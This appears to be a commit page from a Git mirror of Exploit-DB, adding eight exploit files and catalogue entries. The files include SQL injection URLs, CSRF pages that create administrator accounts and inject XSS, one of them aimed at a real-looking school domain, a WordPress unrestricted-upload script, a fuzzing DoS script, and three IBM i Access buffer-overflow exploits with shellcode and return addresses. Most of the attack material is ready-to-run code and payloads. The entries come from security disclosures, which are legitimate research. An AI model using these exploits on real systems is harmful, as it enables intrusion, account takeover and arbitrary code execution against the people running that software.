bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-11-19

Browse source 
8 new exploits
This commit is contained in:
Offensive Security 2015-11-19 05:03:31 +00:00
parent 95a1b072fe
commit 043724668f
9 changed files with 507 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -31880,7 +31880,7 @@ id,file,description,date,author,platform,type,port
35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Parameter Local File Include Vulnerability",2011-02-16,"AutoSec Tools",php,webapps,0
35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0
35378,platforms/php/webapps/35378.txt,"Wordpress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80
35379,platforms/windows/dos/35379.go,"Elipse E3 HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
35379,platforms/windows/dos/35379.go,"Elipse E3 - HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0
35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80
@ -35013,3 +35013,11 @@ id,file,description,date,author,platform,type,port
38739,platforms/java/webapps/38739.txt,"SearchBlox Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0
38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS 'top.aspx' Information Disclosure Vulnerability",2013-08-26,"Pedro Andujar",php,webapps,0
38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write Vulnerability",2013-08-06,"Piotr Duszynski",linux,remote,0
38744,platforms/php/webapps/38744.txt,"appRain CMF Multiple Cross Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0
38745,platforms/php/webapps/38745.txt,"Xibo 'layout' Parameter HTML Injection Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0
38746,platforms/php/webapps/38746.html,"Xibo Cross Site Request Forgery Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0
38747,platforms/windows/dos/38747.py,"Pwstore Denial of Service Vulnerability",2013-04-16,"Josep Pi Rodriguez",windows,dos,0
38748,platforms/php/webapps/38748.txt,"dBlog CMS 'm' Parameter SQL Injection Vulnerability",2013-09-03,ACC3SS,php,webapps,0
38749,platforms/asp/webapps/38749.txt,"Flo CMS 'archivem' Parameter SQL Injection Vulnerability",2013-09-03,ACC3SS,asp,webapps,0
38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0
38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0

Can't render this file because it is too large.

7
platforms/asp/webapps/38749.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/62186/info
Flo CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/blog/index.asp?archivem='

24
platforms/php/webapps/38744.txt Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/62061/info
appRain CMF is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
appRain CMF 3.0.2 is vulnerable; other versions may also be affected.
<img src="http://www.example.com//appRain-v-3.0.2/common/delete_row/Admin/[ID]" width="1" height="1">
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
action="http://www.example.com/appRain-v-3.0.2/admin/manage/add" method="post">
<input type="hidden" name="data[Admin][f_name]" value="abc">
<input type="hidden" name="data[Admin][l_name]" value="defghi">
<input type="hidden" name="data[Admin][email]" value="y.xvz@gmail.com">
<input type="hidden" name="data[Admin][username]" value="abc">
<input type="hidden" name="data[Admin][password]" value="abc123">
<input type="hidden" name="data[Admin][status]" value="Active">
<input type="hidden" name="data[Admin][description]" value="">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>

11
platforms/php/webapps/38745.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/62063/info
Xibo is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user; other attacks are also possible.
Xibo 1.4.2 is vulnerable; other versions may also be affected.
POST: /index.php?p=layout&q=add&ajax=true
Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0

75
platforms/php/webapps/38746.html Executable file
View file

@ -0,0 +1,75 @@
source: http://www.securityfocus.com/bid/62064/info
Xibo is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Xibo 1.4.2 is vulnerable; other versions may also be affected.
<html>
<head>
<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
function RF1(){
document.write('<form name="addAdmin" target ="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
'<input type="hidden" name="userid" value="0">'+
'<input type="hidden" name="username" value="Gimppy">'+
'<input type="hidden" name="password" value="ISE">'+
'<input type="hidden" name="email" value="Gimppy@infosec42.com">'+
'<input type="hidden" name="usertypeid" value="1">'+
'<input type="hidden" name="groupid" value="1">'+
'</form>');
}
//Set XSS Payloads
function RF2(){
document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
'<input type="hidden" name="layoutid" value="0">'+
'<input type="hidden" name="layout" value="Gimppy<img src=42 onerror='alert(42)'>">'+
'<input type="hidden" name="description" value="<iframe src='http://securityevaluators.com' width=100 height=1000</iframe>">'+
'<input type="hidden" name="tags" value="">'+
'<input type="hidden" name="templateid" value="0">'+
'</form>');
}
function createPage(){
RF1();
RF2();
}
function _addAdmin(){
document.addAdmin.submit();
}
function _addXSS(){
document.addXSS.submit();
}
//Called Functions
createPage()
for (var i = 0; i < 2; i++){
if(i == 0){
window.setTimeout(_addAdmin, 0500);
}
else if(i == 1){
window.setTimeout(_addXSS, 1000);
}
else{
continue;
}
}
</script>
</body>
</html>

7
platforms/php/webapps/38748.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/62146/info
dBlog CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/dblog/storico.asp?m=[Sql Injection]

96
platforms/php/webapps/38750.txt Executable file
View file

@ -0,0 +1,96 @@
* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps
Description
================================================================================
WordPress plugin `Users Ultra Plugin` suffers for an unrestricted file upload vulnerability.
Any user (registered or not) can exploit a misbehavior of the plugin in order to upload csv files to the infected website. Although the plugin checks file extension using an extensions white-list (in this case only csv files are white-listed), no other checks (mime, size etc) are taking place. This alone can expose the infected website to a variety of attacks, please see [OWASP Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) to get an idea.
Details
================================================================================
The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:
1. Upon initialization of the plugin (anytime if it is activated) an instance of `XooUserUser` class is created
2. In the constructor of `XooUserUser` class a check for POST variable `uultra-form-cvs-form-conf` is taking place
file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php` lines 19-23
```php
if (isset($_POST['uultra-form-cvs-form-conf']))
{
/* Let's Update the Profile */
$this->process_cvs($_FILES);
}
```
3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called.
4. `XooUserUser::process_cvs()` method process every file in $_FILES super-global by only making a check if the file has a `csv` extension
In addition we mark the following points:
1. A malicious user can create and activate user accounts by exploiting this vulnerability if `$_POST["uultra-activate-account"]` is set to `active`
2. A welcome email is send if `$_POST["uultra-send-welcome-email"]` is set to 1
3. The csv files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone
4. Any additional columns present in the csv file are stored in `usermeta`
5. No sanitization for values in csv file can easily lead to a Persistent XSS attack, so an attacker can compromise the whole site
PoC
================================================================================
The following Python3 script forms a csv file and uploads it to a site
```python3
#!/usr/bin/python3
import requests
import csv
import tempfile
url = 'http://example.com/'
postData = {
'uultra-form-cvs-form-conf': 1,
'uultra-send-welcome-email': 1,
'uultra-activate-account': 'pending'
}
csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country']
csvFileRow = ['userName', 'email@example.com', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO']
csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv')
wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',')
wr.writerow(csvFileHeader)
wr.writerow(csvFileRow)
csvFile.seek(0)
files = {'file.csv': csvFile}
r = requests.post(url, data=postData, files=files)
exit(0)
```
Timeline
================================================================================
2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/11/15 - Vendor responded
2015/11/15 - Patch released
Solution
================================================================================
Update to version 1.5.59

45
platforms/windows/dos/38747.py Executable file
View file

@ -0,0 +1,45 @@
source: http://www.securityfocus.com/bid/62112/info
pwStore is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the application, denying service to legitimate users.
pwStore 2010.8.30.0 is vulnerable; other versions may also be affected.
#!/usr/bin/env python
from sulley import *
import sys
import time
s_initialize("HTTP")
s_static("GET / HTTP/1.1\r\n")
s_static("Host")
s_static(":\x0d\x0a")
s_static(" ")
s_string("192.168.1.39")
s_static("\r\n")
s_static("\r\n")
print "Instantiating session"
sess = sessions.session(session_filename="https_pwstore.session", proto="ssl", sleep_time=0.50)
print "Instantiating target"
target = sessions.target("192.168.1.39", 443)
#target.procmon = pedrpc.client("127.0.0.1", 26002)
#target.netmon = pedrpc.client("127.0.0.1", 26001)
target.procmon_options = {
"proc_name" : "savant.exe",
"stop_commands" : ['wmic process where (name="savant.exe") delete"'],
"start_commands" : ['C:\\savant\\savant.exe'],
}
print "Adding target"
sess.add_target(target)
print "Building graph"
sess.connect(s_get("HTTP"))
print "Starting fuzzing now"
sess.fuzz()

233
platforms/windows/local/38751.txt Executable file
View file

@ -0,0 +1,233 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt
Vendor:
==============
www.ibm.com
Product:
====================================================
IBM i Access for Windows
Release 7.1 of IBM i Access for Windows is affected
Vulnerability Type:
=======================
Stack Buffer Overflow
Arbitrary Code Exec
CVE Reference:
==============
CVE-2015-2023
Vulnerability Details:
=====================
IBM i Access for Windows is vulnerable to a buffer overflow. A local
attacker could overflow a buffer and execute arbitrary code on the Windows PC.
client Access has ability to receive remote commands via "Cwbrxd.exe"
service
Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253
"Incoming remote command was designed for running non-interactive commands
and programs on a PC", therefore a remote attacker could execute arbitrary code on the system.
Remediation/Fixes
The issue can be fixed by obtaining and applying the Service Pack SI57907.
The buffer overflow vulnerability can be remediated by applying Service
Pack SI57907.
The Service Pack is available at:
http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html
Workarounds and Mitigations
None known
CVSS Base Score: 4.4
CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the
current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P)
Exploit code(s):
==============================================================================
Three python POC scriptz follow that exploitz various component of IBM i
Access.
1) Exploits "ftdwprt.exe", direct EIP overwrite
import struct,os,subprocess
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwprt.exe "
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
# use jmp or call esp in FTDBT.dll under AFPviewer for Client Access
# we find ---> 0x638091df : jmp esp | {PAGE_EXECUTE_READ} [FTDBDT.dll]
ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00
(C:\Program Files (x86)\IBM\Client Access\AFPViewr\FTDBDT.dll)
rp=struct.pack('<L', 0x638091FB)
payload="A" * 1043+rp+sc+"\x90"*20
subprocess.Popen([pgm, payload], shell=False) #<----1043 bytes outside of
debugger use 1044 in debugger.
==================================
2) Exploits "ftdwinvw.exe", direct EIP overwrite
import struct,os,subprocess
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwinvw.exe "
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
#payload="A"*1044+"RRRR"+"\x90"*10+"B"*100 #Test EIP
rp=struct.pack('<L', 0x638091fb) #CALL ESP (0x638091fb) FTDBDT.dll
payload="A"*1044+rp+"\x90"*10+sc #KABOOM!!!
subprocess.Popen([pgm, payload], shell=False)
registers dump...
EAX 0000040B
ECX 0044AAB8 ASCII "AAAAAAAAA...
EDX 7F17E09F
EBX 00000000
ESP 0018E5B8
EBP 41414141
ESI 005A9FB9 ASCII "AAAAAAAAA...
EDI 0044E94C ftdwinvw.0044E94C
EIP 52525252 <----------BOOM!
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
3) Exploits "PCSWS.exe", structured exeception handler (SEH) overwrite
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\Emulator\\pcsws.exe "
#ctrl EIP at 1340 bytes, ESP points to RETURN to ntdll.770BB499 so we will
jump 8 bytes to our SC
#as ESP points to our SC 8 bytes after!
jmp="\xEB\x06"+"\x90"*2
#payload="A"*1336+"BBBB" #Test
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
rp=struct.pack('<L', 0x678c1e49) #pop pop ret 0x67952486
PCSW32X.dll
payload="A"*1332+jmp+rp+sc+"\x90"*10 #KABOOOOOOOOOOOOOOOOOOM!
subprocess.Popen([pgm, payload], shell=False)
register dump...
0018FF6C 41414141 AAAA
0018FF70 41414141 AAAA
0018FF74 41414141 AAAA
0018FF78 41414141 AAAA Pointer to next SEH record
0018FF7C 42424242 BBBB SE handler
0018FF80 004C0400 .L. pcsws.004C0400
Disclosure Timeline:
====================================
Vendor Notification: May 21, 2015
November 18, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local / Remote
Severity Level:
================
High
Description:
=================================================================================
Request Method(s): [+] local or remote commands via "Cwbrxd.exe"
service
Vulnerable Product: [+] IBM i Access for Windows Release 7.1
Affected Area(s): [+] OS
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx